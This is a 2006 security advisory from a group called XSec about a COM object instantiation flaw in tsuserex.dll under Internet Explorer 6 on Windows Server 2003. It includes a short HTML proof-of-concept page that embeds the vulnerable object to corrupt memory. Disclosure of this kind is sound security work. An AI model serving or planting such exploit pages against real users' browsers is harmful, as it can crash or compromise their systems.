Advisory ID:
XSec-06-06
Advisory Name:
Windows 2003 (tsuserex.dll) COM Object Instantiation Vulnerability
Release Date:
08/18/2006
Tested on:
Internet Explorer 6.0 SP1 on Microsoft Windows 2003 EE SP1 CN
Affected version:
Windows Server 2003 + Internet Explorer 6.0
Author:
nop <nop#xsec.org>
http://www.xsec.org
Overview:
A vulnerability has been found in Internet Explorer 6.0 on Microsoft Windows 2003. When Internet Explorer tries to instantiate the tsuserex.dll (Terminal Services) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker may DoS and possibly could execute arbitrary code.
Exploit:
=============== tsuserex.dll.htm start ================
<!--
// Microsoft Windows 2003 (tsuserex.dll) COM Object Instantiation
Vulnerability
// tested on Windows 2003 EE SP1 CN
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}
// Info: ADsTSUserEx Class
// ProgID: tsuserex.ADsTSUserEx.1
// InprocServer32: C:\WINDOWS\system32\tsuserex.dll
--!>
<html><body>
<object classid="CLSID:{E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}"> </object>
</body>
</html>
=============== tsuserex.dll.htm end ==================
Link:
http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=14
About XSec:
We are redhat.